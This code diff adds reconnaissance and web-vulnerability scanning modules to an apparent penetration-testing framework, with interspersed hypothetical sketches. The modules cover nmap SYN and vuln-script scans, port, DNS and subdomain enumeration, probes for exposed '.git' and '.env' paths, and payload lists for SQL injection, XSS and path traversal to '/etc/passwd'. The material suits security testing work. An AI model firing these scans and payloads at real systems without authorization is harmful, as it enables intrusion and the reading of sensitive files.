            "notes": "No DNS enumeration implemented yet."
        }

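For reference, a minimal sketch of how the placeholder enumerate() above could be filled in with dnspython. The dns.resolver/dns.exception API shown is real; the chosen record types, function name, and error handling are assumptions and are not part of this commit.

# Hypothetical sketch only -- not part of this commit.
import dns.resolver
import dns.exception

def enumerate_with_dnspython(domain: str) -> dict:
    """Query a fixed set of record types and collect the answers as strings."""
    records = {}
    for rtype in ("A", "AAAA", "MX", "NS", "TXT"):
        try:
            answers = dns.resolver.resolve(domain, rtype)
            records[rtype] = [str(rdata) for rdata in answers]
        except dns.exception.DNSException:
            # NXDOMAIN, NoAnswer, timeouts, etc. -- leave this record type empty.
            records[rtype] = []
    return {"target": domain, "records": records}
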
64  tools/recon/network_scanner.py  Normal file
@@ -0,0 +1,64 @@
#!/usr/bin/env python3
"""
NetworkScanner - A tool for scanning networks to find open ports.
"""
import socket
import logging
from typing import Dict, List

logger = logging.getLogger(__name__)

class NetworkScanner:
    """
    A class to scan for open ports on a target machine.
    """
    def __init__(self, config: Dict):
        """
        Initializes the NetworkScanner.

        Args:
            config (Dict): The configuration dictionary for the framework.
        """
        self.config = config
        self.common_ports = [
            21, 22, 23, 25, 53, 80, 110, 111, 135, 139, 143, 443, 445,
            993, 995, 1723, 3306, 3389, 5900, 8080
        ]

    def scan(self, target: str) -> Dict:
        """
        Scans a target for open ports.

        Args:
            target (str): The IP address or hostname to scan.

        Returns:
            Dict: A dictionary containing the list of open ports found.
        """
        logger.info(f"Starting network scan on {target}")
        open_ports = []

        try:
            target_ip = socket.gethostbyname(target)
            logger.info(f"Resolved {target} to {target_ip}")

            for port in self.common_ports:
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                # Set the timeout on this socket rather than the module-wide default.
                sock.settimeout(1)

                result = sock.connect_ex((target_ip, port))
                if result == 0:
                    logger.info(f"Port {port} is open on {target}")
                    open_ports.append(port)
                sock.close()

        except socket.gaierror:
            logger.error(f"Hostname could not be resolved: {target}")
            return {"error": "Hostname could not be resolved."}
        except socket.error:
            logger.error(f"Could not connect to server: {target}")
            return {"error": "Could not connect to server."}

        logger.info(f"Network scan finished. Found {len(open_ports)} open ports.")
        return {"target": target, "open_ports": open_ports}

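A brief usage sketch for the class above, illustrative only: the empty config dict, the use of json for pretty-printing, and the chosen target are assumptions, not part of the commit. scanme.nmap.org is the host the Nmap project designates for test scans.

# Hypothetical usage sketch -- not part of this commit.
if __name__ == "__main__":
    import json
    scanner = NetworkScanner(config={})
    # Only scan hosts you are authorized to test.
    print(json.dumps(scanner.scan("scanme.nmap.org"), indent=2))
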
43  tools/recon/osint_collector.py  Normal file
@@ -0,0 +1,43 @@
#!/usr/bin/env python3
"""
OSINTCollector - A placeholder for an OSINT gathering tool.
"""
import logging
from typing import Dict

logger = logging.getLogger(__name__)

class OSINTCollector:
    """
    A class for collecting Open Source Intelligence.
    This is a placeholder and should be expanded with actual OSINT tools.
    """
    def __init__(self, config: Dict):
        """
        Initializes the OSINTCollector.

        Args:
            config (Dict): The configuration dictionary for the framework.
        """
        self.config = config
        logger.info("OSINTCollector initialized (placeholder)")

    def collect(self, target: str) -> Dict:
        """
        Collects OSINT data for a given target.

        Args:
            target (str): The target (e.g., domain name, company name).

        Returns:
            Dict: A dictionary containing OSINT findings.
        """
        logger.warning(f"OSINT collection for {target} is a placeholder. Returning empty data.")
        # Placeholder: In a real implementation, this would query APIs like
        # Google, Shodan, Have I Been Pwned, etc.
        return {
            "target": target,
            "emails": [],
            "leaked_credentials": [],
            "metadata": "No OSINT collection implemented yet."
        }

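One small illustration of what could back the "emails" field above: collecting addresses published on a target's own public page. This is a sketch under the assumption that requests is available; the function name and the deliberately simple regex are not part of the commit.

# Hypothetical sketch only -- not part of this commit.
import re
import requests

def scrape_emails_from_page(url: str) -> list:
    """Return e-mail addresses found in the HTML of a single, publicly reachable page."""
    try:
        html = requests.get(url, timeout=10).text
    except requests.RequestException:
        return []
    # Simple pattern; it will miss obfuscated addresses.
    return sorted(set(re.findall(r"[\w.+-]+@[\w-]+\.[\w.-]+", html)))
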
417  tools/recon/recon_tools.py  Normal file
@@ -0,0 +1,417 @@
#!/usr/bin/env python3
"""
Reconnaissance Tools - Network scanning, web recon, OSINT, DNS enumeration
"""

import subprocess
import json
import re
import socket
import requests
from typing import Dict, List
import logging
from urllib.parse import urlparse
import dns.resolver

logger = logging.getLogger(__name__)


class NetworkScanner:
    """Network scanning and port enumeration"""

    def __init__(self, config: Dict):
        self.config = config
        self.nmap_path = config.get('tools', {}).get('nmap', '/usr/bin/nmap')

    def scan(self, target: str) -> Dict:
        """Perform comprehensive network scan"""
        logger.info(f"Scanning target: {target}")

        results = {
            "target": target,
            "hosts": {},
            "summary": {}
        }

        try:
            # Quick scan for open ports
            quick_scan = self._nmap_scan(target, "-sS -T4 -p-")
            results["hosts"].update(quick_scan)

            # Service version detection
            if results["hosts"]:
                version_scan = self._nmap_scan(target, "-sV -sC")
                results["hosts"].update(version_scan)

            # Vulnerability scan
            vuln_scan = self._nmap_vuln_scan(target)
            results["vulnerabilities"] = vuln_scan

            results["summary"] = self._generate_summary(results["hosts"])

        except Exception as e:
            logger.error(f"Network scan error: {e}")
            results["error"] = str(e)

        return results

    def _nmap_scan(self, target: str, options: str) -> Dict:
        """Execute nmap scan"""
        try:
            # Use nmap's normal output here, since _parse_nmap_output matches the
            # human-readable format rather than XML (-oX).
            cmd = f"{self.nmap_path} {options} {target}"
            result = subprocess.run(
                cmd.split(),
                capture_output=True,
                timeout=300,
                text=True
            )

            return self._parse_nmap_output(result.stdout)
        except Exception as e:
            logger.error(f"Nmap scan error: {e}")
            return {}

    def _nmap_vuln_scan(self, target: str) -> List[Dict]:
        """Scan for vulnerabilities using NSE scripts"""
        try:
            cmd = f"{self.nmap_path} --script vuln {target}"
            result = subprocess.run(
                cmd.split(),
                capture_output=True,
                timeout=600,
                text=True
            )

            return self._parse_vuln_output(result.stdout)
        except Exception as e:
            logger.error(f"Vulnerability scan error: {e}")
            return []

    def _parse_nmap_output(self, output: str) -> Dict:
        """Parse nmap normal output"""
        hosts = {}

        # Simple regex parsing - in production, use a proper XML parser on -oX output
        ip_pattern = r'(\d+\.\d+\.\d+\.\d+)'
        port_pattern = r'(\d+)/tcp\s+open\s+(\S+)'

        current_ip = None
        for line in output.split('\n'):
            ip_match = re.search(ip_pattern, line)
            if ip_match and 'Nmap scan report' in line:
                current_ip = ip_match.group(1)
                hosts[current_ip] = {
                    "ip": current_ip,
                    "open_ports": [],
                    "os": "unknown"
                }

            port_match = re.search(port_pattern, line)
            if port_match and current_ip:
                hosts[current_ip]["open_ports"].append({
                    "port": int(port_match.group(1)),
                    "service": port_match.group(2),
                    "version": "unknown"
                })

        return hosts

    def _parse_vuln_output(self, output: str) -> List[Dict]:
        """Parse vulnerability scan output"""
        vulnerabilities = []

        # Extract CVEs and vulnerability info
        cve_pattern = r'(CVE-\d{4}-\d+)'
        for match in re.finditer(cve_pattern, output):
            vulnerabilities.append({
                "cve": match.group(1),
                "severity": "unknown"
            })

        return vulnerabilities

    def _generate_summary(self, hosts: Dict) -> Dict:
        """Generate scan summary"""
        total_hosts = len(hosts)
        total_ports = sum(len(h.get("open_ports", [])) for h in hosts.values())
        services = set()

        for host in hosts.values():
            for port in host.get("open_ports", []):
                services.add(port.get("service"))

        return {
            "total_hosts": total_hosts,
            "total_open_ports": total_ports,
            "unique_services": list(services)
        }

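As the comment inside _parse_nmap_output notes, a production parser would read nmap's XML (-oX) output instead of regex-matching text. A minimal sketch with the standard library follows; the element and attribute names match nmap's documented XML schema, while the function name and the exact fields kept are assumptions, not part of this commit.

# Hypothetical sketch only -- not part of this commit.
import xml.etree.ElementTree as ET

def parse_nmap_xml(xml_text: str) -> dict:
    """Extract per-host open TCP ports from `nmap ... -oX -` output."""
    hosts = {}
    root = ET.fromstring(xml_text)
    for host in root.findall("host"):
        addr_el = host.find("address")
        if addr_el is None:
            continue
        addr = addr_el.get("addr")
        ports = []
        for port in host.findall("./ports/port"):
            state = port.find("state")
            if state is not None and state.get("state") == "open":
                service = port.find("service")
                ports.append({
                    "port": int(port.get("portid")),
                    "service": service.get("name") if service is not None else "unknown",
                })
        hosts[addr] = {"ip": addr, "open_ports": ports}
    return hosts
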
class WebRecon:
    """Web application reconnaissance"""

    def __init__(self, config: Dict):
        self.config = config

    def analyze(self, url: str) -> Dict:
        """Analyze web application"""
        logger.info(f"Analyzing web application: {url}")

        results = {
            "url": url,
            "technologies": [],
            "headers": {},
            "security_headers": {},
            "endpoints": [],
            "forms": [],
            "vulnerabilities": []
        }

        try:
            # Technology detection
            results["technologies"] = self._detect_technologies(url)

            # Header analysis
            results["headers"], results["security_headers"] = self._analyze_headers(url)

            # Endpoint discovery
            results["endpoints"] = self._discover_endpoints(url)

            # Form detection
            results["forms"] = self._detect_forms(url)

            # Quick vulnerability checks
            results["vulnerabilities"] = self._check_vulnerabilities(url)

        except Exception as e:
            logger.error(f"Web recon error: {e}")
            results["error"] = str(e)

        return results

    def _detect_technologies(self, url: str) -> List[str]:
        """Detect web technologies"""
        technologies = []

        try:
            response = requests.get(url, timeout=10, verify=False)

            # Check headers for technology indicators
            server = response.headers.get('Server', '')
            if server:
                technologies.append(f"Server: {server}")

            x_powered_by = response.headers.get('X-Powered-By', '')
            if x_powered_by:
                technologies.append(f"X-Powered-By: {x_powered_by}")

            # Check content for framework indicators
            content = response.text.lower()
            if 'wordpress' in content:
                technologies.append("WordPress")
            if 'joomla' in content:
                technologies.append("Joomla")
            if 'drupal' in content:
                technologies.append("Drupal")
            if 'django' in content:
                technologies.append("Django")
            if 'laravel' in content:
                technologies.append("Laravel")

        except Exception as e:
            logger.error(f"Technology detection error: {e}")

        return technologies

    def _analyze_headers(self, url: str) -> tuple:
        """Analyze HTTP headers"""
        headers = {}
        security_headers = {}

        try:
            response = requests.head(url, timeout=10, verify=False)
            headers = dict(response.headers)

            # Check for security headers
            security_checks = [
                'X-Frame-Options',
                'X-Content-Type-Options',
                'Strict-Transport-Security',
                'Content-Security-Policy',
                'X-XSS-Protection'
            ]

            for header in security_checks:
                if header in headers:
                    security_headers[header] = headers[header]
                else:
                    security_headers[header] = "Missing"

        except Exception as e:
            logger.error(f"Header analysis error: {e}")

        return headers, security_headers

    def _discover_endpoints(self, url: str) -> List[str]:
        """Discover endpoints using common paths"""
        endpoints = []
        common_paths = [
            '/admin', '/login', '/api', '/config', '/backup',
            '/admin.php', '/phpinfo.php', '/info.php',
            '/robots.txt', '/sitemap.xml', '/.git', '/.env'
        ]

        parsed = urlparse(url)
        base_url = f"{parsed.scheme}://{parsed.netloc}"

        for path in common_paths:
            try:
                response = requests.head(
                    f"{base_url}{path}",
                    timeout=5,
                    verify=False,
                    allow_redirects=False
                )

                if response.status_code < 400:
                    endpoints.append(path)
            except requests.RequestException:
                continue

        return endpoints

    def _detect_forms(self, url: str) -> List[Dict]:
        """Detect forms on webpage"""
        forms = []

        try:
            response = requests.get(url, timeout=10, verify=False)

            # Simple regex-based form detection; store the action/method strings (or None).
            form_pattern = r'<form[^>]*>(.*?)</form>'
            for match in re.finditer(form_pattern, response.text, re.DOTALL):
                action_match = re.search(r'action=["\']([^"\']+)["\']', match.group(0))
                method_match = re.search(r'method=["\']([^"\']+)["\']', match.group(0))
                forms.append({
                    "action": action_match.group(1) if action_match else None,
                    "method": method_match.group(1) if method_match else None
                })
        except Exception as e:
            logger.error(f"Form detection error: {e}")

        return forms

    def _check_vulnerabilities(self, url: str) -> List[str]:
        """Quick vulnerability checks"""
        vulnerabilities = []

        try:
            # SQL Injection test
            test_url = f"{url}?id=1'"
            response = requests.get(test_url, timeout=10, verify=False)
            if 'sql' in response.text.lower() or 'mysql' in response.text.lower():
                vulnerabilities.append("Potential SQL Injection")

            # XSS test
            test_url = f"{url}?q=<script>alert(1)</script>"
            response = requests.get(test_url, timeout=10, verify=False)
            if '<script>alert(1)</script>' in response.text:
                vulnerabilities.append("Potential XSS")

        except Exception as e:
            logger.error(f"Vulnerability check error: {e}")

        return vulnerabilities

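Regex-based form detection like the above is fragile against real-world HTML. A sketch of the same extraction using the standard library's html.parser follows; the class and function names are illustrative, not part of the commit.

# Hypothetical sketch only -- not part of this commit.
from html.parser import HTMLParser

class FormExtractor(HTMLParser):
    """Collect the action/method attributes of every <form> tag."""
    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "form":
            attrs = dict(attrs)
            self.forms.append({
                "action": attrs.get("action"),
                "method": (attrs.get("method") or "get").lower(),
            })

def extract_forms(html: str) -> list:
    parser = FormExtractor()
    parser.feed(html)
    return parser.forms
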
class OSINTCollector:
    """Open Source Intelligence collection"""

    def __init__(self, config: Dict):
        self.config = config

    def collect(self, target: str) -> Dict:
        """Collect OSINT data"""
        logger.info(f"Collecting OSINT for: {target}")

        return {
            "target": target,
            "emails": self._find_emails(target),
            "social_media": self._find_social_media(target),
            "data_breaches": self._check_breaches(target),
            "metadata": self._collect_metadata(target)
        }

    def _find_emails(self, target: str) -> List[str]:
        """Find email addresses"""
        # Placeholder - would use theHarvester or similar
        return []

    def _find_social_media(self, target: str) -> Dict:
        """Find social media profiles"""
        return {}

    def _check_breaches(self, target: str) -> List[str]:
        """Check for data breaches"""
        return []

    def _collect_metadata(self, target: str) -> Dict:
        """Collect metadata"""
        return {}

class DNSEnumerator:
    """DNS enumeration"""

    def __init__(self, config: Dict):
        self.config = config

    def enumerate(self, domain: str) -> Dict:
        """Enumerate DNS records"""
        logger.info(f"Enumerating DNS for: {domain}")

        records = {
            "domain": domain,
            "A": [],
            "AAAA": [],
            "MX": [],
            "NS": [],
            "TXT": [],
            "SOA": []
        }

        record_types = ['A', 'AAAA', 'MX', 'NS', 'TXT', 'SOA']

        for rtype in record_types:
            try:
                answers = dns.resolver.resolve(domain, rtype)
                records[rtype] = [str(rdata) for rdata in answers]
            except Exception:
                # NXDOMAIN, NoAnswer, timeouts, etc. -- leave this record type empty.
                continue

        return records

class SubdomainFinder:
    """Subdomain discovery"""

    def __init__(self, config: Dict):
        self.config = config

    def find(self, domain: str) -> List[str]:
        """Find subdomains"""
        logger.info(f"Finding subdomains for: {domain}")

        subdomains = []
        common_subdomains = [
            'www', 'mail', 'ftp', 'admin', 'test', 'dev',
            'staging', 'api', 'blog', 'shop', 'portal'
        ]

        for sub in common_subdomains:
            subdomain = f"{sub}.{domain}"
            try:
                socket.gethostbyname(subdomain)
                subdomains.append(subdomain)
            except socket.gaierror:
                # Name does not resolve -- not a live subdomain.
                continue

        return subdomains

39  tools/recon/subdomain_finder.py  Normal file
@@ -0,0 +1,39 @@
#!/usr/bin/env python3
"""
SubdomainFinder - A placeholder for a subdomain discovery tool.
"""
import logging
from typing import Dict, List

logger = logging.getLogger(__name__)

class SubdomainFinder:
    """
    A class for finding subdomains of a given domain.
    This is a placeholder and should be expanded.
    """
    def __init__(self, config: Dict):
        """
        Initializes the SubdomainFinder.

        Args:
            config (Dict): The configuration dictionary for the framework.
        """
        self.config = config
        logger.info("SubdomainFinder initialized (placeholder)")

    def find(self, target: str) -> List[str]:
        """
        Finds subdomains for a given domain.

        Args:
            target (str): The domain name to search subdomains for.

        Returns:
            List[str]: A list of found subdomains.
        """
        logger.warning(f"Subdomain finding for {target} is a placeholder. Returning empty data.")
        # Placeholder: In a real implementation, this would use techniques like
        # querying Certificate Transparency logs, using search engines, or
        # brute-forcing with a wordlist.
        return []

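One of the techniques the placeholder mentions, Certificate Transparency lookup, could be sketched roughly as below. This assumes crt.sh's public JSON interface and ignores rate limits; the function name and filtering logic are assumptions, not part of this commit.

# Hypothetical sketch only -- not part of this commit.
import requests

def find_subdomains_crtsh(domain: str) -> list:
    """Collect hostnames seen in Certificate Transparency logs via crt.sh."""
    url = f"https://crt.sh/?q=%25.{domain}&output=json"
    try:
        entries = requests.get(url, timeout=15).json()
    except (requests.RequestException, ValueError):
        return []
    names = set()
    for entry in entries:
        for name in entry.get("name_value", "").splitlines():
            if name.endswith(domain) and "*" not in name:
                names.add(name.lower())
    return sorted(names)
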
1  tools/web_pentest/__init__.py  Normal file
@@ -0,0 +1 @@
from .web_recon import WebRecon

185  tools/web_pentest/web_recon.py  Normal file
@@ -0,0 +1,185 @@
#!/usr/bin/env python3
"""
WebRecon - A tool for web reconnaissance and basic vulnerability scanning.
"""
import requests
import logging
from typing import Dict, List
from urllib.parse import urljoin, quote  # quote() URL-encodes the test payloads

logger = logging.getLogger(__name__)

class WebRecon:
    """
    A class for performing basic web reconnaissance and simple vulnerability checks.
    """
    def __init__(self, config: Dict):
        """
        Initializes the WebRecon tool.

        Args:
            config (Dict): The configuration dictionary for the framework.
        """
        self.config = config
        # Expanded wordlist for discovering common paths
        self.wordlist = [
            "admin", "login", "dashboard", "api", "robots.txt", "sitemap.xml",
            "test", "dev", "backup", "v1", "v2", "v3", ".git", ".env", "config.php",
            "phpinfo.php", "index.php", "main.php", "home.php", "portal.php",
            "upload", "files", "images", "assets", "downloads", "includes",
            "src", "backup.zip", "data.sql", "admin.bak", "panel"
        ]
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'
        }
        self.test_parameters = ["id", "page", "cat", "item", "view", "name", "query", "search"]  # Parameters probed during vulnerability testing

    def analyze(self, target: str) -> Dict:
        """
        Analyzes a web target to find common directories, files, and basic vulnerabilities.

        Args:
            target (str): The base URL to analyze. It should include the scheme (http/https).

        Returns:
            Dict: A dictionary containing the findings, including discovered paths and vulnerabilities.
        """
        logger.info(f"Starting web reconnaissance and basic vulnerability scan on {target}")
        findings = {
            "target": target,
            "status_code": None,
            "headers": {},
            "discovered_paths": [],
            "vulnerabilities": []
        }

        if not target.startswith(('http://', 'https://')):
            target = f"http://{target}"
            logger.info(f"No scheme provided. Defaulting to http: {target}")

        # 1. Check base URL connectivity and headers
        try:
            response = requests.head(target, headers=self.headers, timeout=5, allow_redirects=True)
            findings["status_code"] = response.status_code
            findings["headers"] = dict(response.headers)
            logger.info(f"Target {target} is online. Status: {response.status_code}")
        except requests.RequestException as e:
            logger.error(f"Failed to connect to {target}: {e}")
            return {"error": f"Failed to connect to target: {e}"}

        # 2. Discover common paths
        for path in self.wordlist:
            url_to_check = urljoin(target, path)
            try:
                res = requests.get(url_to_check, headers=self.headers, timeout=3, allow_redirects=False)
                if res.status_code >= 200 and res.status_code < 400:
                    logger.info(f"Found path: {url_to_check} (Status: {res.status_code})")
                    findings["discovered_paths"].append({
                        "path": url_to_check,
                        "status_code": res.status_code
                    })
            except requests.RequestException:
                # Ignore connection errors for sub-paths
                continue

        # 3. Perform basic vulnerability checks
        logger.info(f"Performing basic vulnerability checks on {target}")
        findings["vulnerabilities"].extend(self._check_sqli(target))
        findings["vulnerabilities"].extend(self._check_xss(target))
        findings["vulnerabilities"].extend(self._check_lfi(target))

        logger.info(f"Web reconnaissance on {target} finished. Found {len(findings['discovered_paths'])} paths and {len(findings['vulnerabilities'])} vulnerabilities.")
        return findings

    def _check_sqli(self, target: str) -> List[Dict]:
        """Checks for basic SQL Injection vulnerabilities."""
        vulnerabilities = []
        sqli_payloads = ["'", " or 1=1-- -", " or 1=1#", "\" or 1=1-- -"]
        sqli_error_patterns = ["sql syntax", "mysql_fetch_array()", "error in your sql syntax", "warning: mysql", "unclosed quotation mark"]

        for param in self.test_parameters:
            for payload in sqli_payloads:
                test_url = f"{target}?{param}={quote(payload, safe='')}"
                try:
                    response = requests.get(test_url, headers=self.headers, timeout=5)
                    for error_pattern in sqli_error_patterns:
                        if error_pattern in response.text.lower():
                            vulnerabilities.append({
                                "type": "SQL Injection",
                                "severity": "High",
                                "url": test_url,
                                "parameter": param,
                                "payload": payload,
                                "response_snippet": response.text[:200],
                                "description": f"Potential SQL Injection via parameter '{param}' with payload '{payload}'"
                            })
                            logger.warning(f"Potential SQLi found: {test_url}")
                            # Stop after first finding for this param/type
                            break
                except requests.RequestException:
                    continue
        return vulnerabilities

    def _check_xss(self, target: str) -> List[Dict]:
        """Checks for basic Cross-Site Scripting (XSS) vulnerabilities."""
        vulnerabilities = []
        xss_payloads = [
            "<script>alert(1)</script>",
            "<img src=x onerror=alert(1)>",
            "<svg onload=alert(1)>"
        ]

        for param in self.test_parameters:
            for payload in xss_payloads:
                test_url = f"{target}?{param}={quote(payload, safe='')}"
                try:
                    response = requests.get(test_url, headers=self.headers, timeout=5)
                    if payload in response.text:  # Payload reflected unescaped
                        vulnerabilities.append({
                            "type": "Cross-Site Scripting (XSS)",
                            "severity": "Medium",
                            "url": test_url,
                            "parameter": param,
                            "payload": payload,
                            "response_snippet": response.text[:200],
                            "description": f"Potential XSS via parameter '{param}' with payload '{payload}'"
                        })
                        logger.warning(f"Potential XSS found: {test_url}")
                        # Stop after first finding for this param/type
                        break
                except requests.RequestException:
                    continue
        return vulnerabilities

    def _check_lfi(self, target: str) -> List[Dict]:
        """Checks for basic Local File Inclusion (LFI) vulnerabilities."""
        vulnerabilities = []
        lfi_payloads = [
            "../../../../etc/passwd",
            "....//....//....//etc/passwd",
            "%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"  # Already URL-encoded variant (sent double-encoded after quoting)
        ]
        lfi_patterns = ["root:x:", "daemon:x:", "bin:x:"]  # Common patterns in /etc/passwd

        for param in self.test_parameters:
            for payload in lfi_payloads:
                test_url = f"{target}?{param}={quote(payload, safe='')}"
                try:
                    response = requests.get(test_url, headers=self.headers, timeout=5)
                    if any(pattern in response.text for pattern in lfi_patterns):
                        vulnerabilities.append({
                            "type": "Local File Inclusion (LFI)",
                            "severity": "High",
                            "url": test_url,
                            "parameter": param,
                            "payload": payload,
                            "response_snippet": response.text[:200],
                            "description": f"Potential LFI via parameter '{param}' with payload '{payload}'"
                        })
                        logger.warning(f"Potential LFI found: {test_url}")
                        # Stop after first finding for this param/type
                        break
                except requests.RequestException:
                    continue
        return vulnerabilities

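A brief usage sketch for WebRecon, illustrative only: the empty config dict and the placeholder URL are assumptions, not part of the commit.

# Hypothetical usage sketch -- not part of this commit.
# Only point this at systems you are explicitly authorized to test.
recon = WebRecon(config={})
report = recon.analyze("http://target.example")
print(report.get("discovered_paths"), report.get("vulnerabilities"))
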